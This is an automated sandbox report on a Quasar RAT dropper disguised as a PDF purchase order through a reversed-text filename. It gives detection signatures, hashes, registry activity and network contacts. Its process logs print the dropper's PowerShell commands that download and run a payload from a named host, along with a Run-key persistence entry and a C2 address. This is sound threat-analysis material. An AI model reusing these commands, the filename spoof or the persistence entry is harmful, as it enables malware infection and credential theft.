Malware Analysis Report

2024-10-19 08:35

Sample ID 240729-h13nhsscrc
Target jdconstructnOrder‮fdp..exe
SHA256 8636f8c4fe1fe4859a3feec23a0cecf12391ddbffbb3d2bec5efe8f3aaac74b3
Tags
discovery execution quasar office04 credential_access persistence spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

8636f8c4fe1fe4859a3feec23a0cecf12391ddbffbb3d2bec5efe8f3aaac74b3

Threat Level: Known bad

The file jdconstructnOrder‮fdp..exe was found to be: Known bad.

Malicious Activity Summary

discovery execution quasar office04 credential_access persistence spyware stealer trojan

Quasar payload

Quasar RAT

Credentials from Password Stores: Credentials from Web Browsers

Downloads MZ/PE file

Command and Scripting Interpreter: PowerShell

Blocklisted process makes network request

Reads user/profile data of web browsers

Reads WinSCP keys stored on the system

Checks computer location settings

.NET Reactor protector

Executes dropped EXE

Adds Run key to start application

System Location Discovery: System Language Discovery

Enumerates physical storage devices

Unsigned PE

Suspicious use of WriteProcessMemory

Suspicious use of FindShellTrayWindow

Suspicious use of SendNotifyMessage

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-07-29 07:13

Signatures

Unsigned PE

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-07-29 07:13

Reported

2024-07-29 07:17

Platform

win7-20240704-en

Max time kernel

117s

Max time network

127s

Command Line

"C:\Users\Admin\AppData\Local\Temp\jdconstructnOrder‮fdp..exe"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\jdconstructnOrder‮fdp..exe | N/A

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Processes

C:\Users\Admin\AppData\Local\Temp\jdconstructnOrder‮fdp..exe

"C:\Users\Admin\AppData\Local\Temp\jdconstructnOrder‮fdp..exe"

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\8298.tmp\8299.tmp\829A.bat C:\Users\Admin\AppData\Local\Temp\jdconstructnOrder‮fdp..exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Powershell -Command "Invoke-WebRequest 'https://jdvdpconstructionltdfileportal.replit.app/purchaseOrder.jpg' -OutFile purchaseOrder.jpg"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Powershell -Command "Invoke-WebRequest 'https://jdvdpconstructionltdfileportal.replit.app/networkrunfdp.exe' -OutFile networkrunfdp.exe"

Network

N/A

Files

C:\Users\Admin\AppData\Local\Temp\8298.tmp\8299.tmp\829A.bat

MD5 9aaac0122442ca0ebb4d8bb795e86676
SHA1 594744d8e4d51273dd435c3fac5799bc5f180e8c
SHA256 6af7e75e339241dac26eca99aa1290c1f420b45b4231212d20adf08aa287e373
SHA512 d08a0dd3b40d80c7582c3f69a7868371e7eb03ac6f4658a39e7a9fb1dd34cc22a5e91d60b31af71c77cebfe0fd0c3827fdbb3cc35224189388345c61e756636c

memory/2748-6-0x000007FEF56DE000-0x000007FEF56DF000-memory.dmp

memory/2748-7-0x000000001B540000-0x000000001B822000-memory.dmp

memory/2748-8-0x0000000002310000-0x0000000002318000-memory.dmp

memory/2748-9-0x000007FEF5420000-0x000007FEF5DBD000-memory.dmp

memory/2748-10-0x000007FEF5420000-0x000007FEF5DBD000-memory.dmp

memory/2748-11-0x000007FEF5420000-0x000007FEF5DBD000-memory.dmp

memory/2748-12-0x000007FEF5420000-0x000007FEF5DBD000-memory.dmp

memory/2748-13-0x000007FEF5420000-0x000007FEF5DBD000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 cb03fc5057bb504c410d7dfc9340cec0
SHA1 688aa6bf36b4f06bee011d9cfe74e90b8e671b1e
SHA256 184994eef087e2619c0725840ca43212800b62b32774d2a5be254986e36dd7f7
SHA512 d897eb6a3dfc04f9fa29b7e7e3f73f191d9ee70d74a299de95a4c27a723c94aef3c41cc795b1c52108bfb73c92ecc8e72d36f56c07b510c35923d6081de77641

memory/2640-19-0x000000001B600000-0x000000001B8E2000-memory.dmp

memory/2640-20-0x0000000001FF0000-0x0000000001FF8000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-07-29 07:13

Reported

2024-07-29 07:16

Platform

win10v2004-20240709-en

Max time kernel

148s

Max time network

159s

Command Line

"C:\Users\Admin\AppData\Local\Temp\jdconstructnOrder‮fdp..exe"

Signatures

Quasar RAT

trojan spyware quasar

Quasar payload

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A

Credentials from Password Stores: Credentials from Web Browsers

credential_access stealer

Blocklisted process makes network request

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Command and Scripting Interpreter: PowerShell

execution
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Downloads MZ/PE file

.NET Reactor protector

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A

Checks computer location settings

Description | Indicator | Process | Target
Key value queried | \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\jdconstructnOrder‮fdp..exe | N/A

Executes dropped EXE

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\networkrunfdp.exe | N/A

Reads WinSCP keys stored on the system

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description | Indicator | Process | Target
Set value (str) | \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NetworkRun.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\networkrunfdp.exe" | C:\Users\Admin\AppData\Local\Temp\networkrunfdp.exe | N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\jdconstructnOrder‮fdp..exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\networkrunfdp.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\networkrunfdp.exe | N/A

Suspicious use of FindShellTrayWindow

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\networkrunfdp.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\networkrunfdp.exe | N/A

Suspicious use of SendNotifyMessage

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\networkrunfdp.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\networkrunfdp.exe | N/A

Processes

C:\Users\Admin\AppData\Local\Temp\jdconstructnOrder‮fdp..exe

"C:\Users\Admin\AppData\Local\Temp\jdconstructnOrder‮fdp..exe"

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\A6DF.tmp\A6E0.tmp\A6F0.bat C:\Users\Admin\AppData\Local\Temp\jdconstructnOrder‮fdp..exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Powershell -Command "Invoke-WebRequest 'https://jdvdpconstructionltdfileportal.replit.app/purchaseOrder.jpg' -OutFile purchaseOrder.jpg"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Powershell -Command "Invoke-WebRequest 'https://jdvdpconstructionltdfileportal.replit.app/networkrunfdp.exe' -OutFile networkrunfdp.exe"

C:\Users\Admin\AppData\Local\Temp\networkrunfdp.exe

networkrunfdp.exe

Network

Country | Destination | Domain | Proto
US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp
US | 8.8.8.8:53 | 81.144.22.2.in-addr.arpa | udp
US | 8.8.8.8:53 | g.bing.com | udp
US | 204.79.197.237:443 | g.bing.com | tcp
US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp
US | 8.8.8.8:53 | 4.159.190.20.in-addr.arpa | udp
US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp
US | 8.8.8.8:53 | jdvdpconstructionltdfileportal.replit.app | udp
US | 34.117.33.233:443 | jdvdpconstructionltdfileportal.replit.app | tcp
US | 8.8.8.8:53 | 233.33.117.34.in-addr.arpa | udp
US | 34.117.33.233:443 | jdvdpconstructionltdfileportal.replit.app | tcp
US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp
US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp
US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp
US | 8.8.8.8:53 | 147.142.123.92.in-addr.arpa | udp
US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp
US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp
US | 8.8.8.8:53 | oshi.at | udp
CZ | 194.15.112.248:443 | oshi.at | tcp
US | 8.8.8.8:53 | 248.112.15.194.in-addr.arpa | udp
US | 192.228.105.2:4782 | | tcp
US | 8.8.8.8:53 | ipwho.is | udp
DE | 195.201.57.90:443 | ipwho.is | tcp
US | 8.8.8.8:53 | 2.105.228.192.in-addr.arpa | udp
US | 8.8.8.8:53 | 90.57.201.195.in-addr.arpa | udp
US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp
US | 8.8.8.8:53 | tse1.mm.bing.net | udp
US | 150.171.28.10:443 | tse1.mm.bing.net | tcp
US | 150.171.28.10:443 | tse1.mm.bing.net | tcp
US | 150.171.28.10:443 | tse1.mm.bing.net | tcp
US | 150.171.28.10:443 | tse1.mm.bing.net | tcp

Files

C:\Users\Admin\AppData\Local\Temp\A6DF.tmp\A6E0.tmp\A6F0.bat

MD5 9aaac0122442ca0ebb4d8bb795e86676
SHA1 594744d8e4d51273dd435c3fac5799bc5f180e8c
SHA256 6af7e75e339241dac26eca99aa1290c1f420b45b4231212d20adf08aa287e373
SHA512 d08a0dd3b40d80c7582c3f69a7868371e7eb03ac6f4658a39e7a9fb1dd34cc22a5e91d60b31af71c77cebfe0fd0c3827fdbb3cc35224189388345c61e756636c

memory/764-2-0x00007FFF64FD3000-0x00007FFF64FD5000-memory.dmp

memory/764-3-0x00000225933D0000-0x00000225933F2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gjyejjjp.zyp.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/764-13-0x00007FFF64FD0000-0x00007FFF65A91000-memory.dmp

memory/764-14-0x00007FFF64FD0000-0x00007FFF65A91000-memory.dmp

memory/764-18-0x00007FFF64FD0000-0x00007FFF65A91000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 2f57fde6b33e89a63cf0dfdd6e60a351
SHA1 445bf1b07223a04f8a159581a3d37d630273010f
SHA256 3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA512 42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 6f857cbceb4b48c43f2483798a60bce7
SHA1 2945024e9161f9971d24c3d5042b614c781ed03a
SHA256 0886411b6e8582aced80f9bd6269d6821c06750180e85b50adb99ec8c4b867ae
SHA512 26db2e395d9b1b856ac4401d6576d5fa0631a7d0696c930ca1f683ec1812cc27406ff8c42f0538fd5e445d46f20aa68b826daf69738dd2647d1b8bea5a85c057

C:\Users\Admin\AppData\Local\Temp\networkrunfdp.exe

MD5 a18b7de2990becc30f700720e19ebfef
SHA1 b48c1a5c7756bccfe05d7999daeb96e7ab688cfd
SHA256 2bf98c947ce0bd8e6e6a0c0493af056790d61ab86c7c47896b4688bdc60b68b5
SHA512 484f8faf3973b74c96b6fea157774c627044fa4631e127de30f9f93468d38e73befa3c3bff3ea07108c82d943c9b56e79c5d6391d0e3a9b197869b0715d2808b

memory/1076-35-0x0000000000870000-0x00000000008DE000-memory.dmp

memory/1076-42-0x0000000005C10000-0x0000000005F35000-memory.dmp

memory/1076-43-0x0000000006680000-0x00000000069A4000-memory.dmp

memory/1076-44-0x0000000006F50000-0x00000000074F4000-memory.dmp

memory/1076-45-0x0000000006440000-0x00000000064D2000-memory.dmp

memory/1076-46-0x00000000064E0000-0x00000000064EA000-memory.dmp

memory/1076-47-0x0000000006600000-0x0000000006650000-memory.dmp

memory/1076-48-0x0000000006D50000-0x0000000006E02000-memory.dmp

memory/1076-49-0x0000000007B20000-0x0000000008138000-memory.dmp

memory/1076-50-0x0000000007870000-0x0000000007882000-memory.dmp

memory/1076-51-0x00000000078D0000-0x000000000790C000-memory.dmp

memory/1076-52-0x0000000007980000-0x00000000079E6000-memory.dmp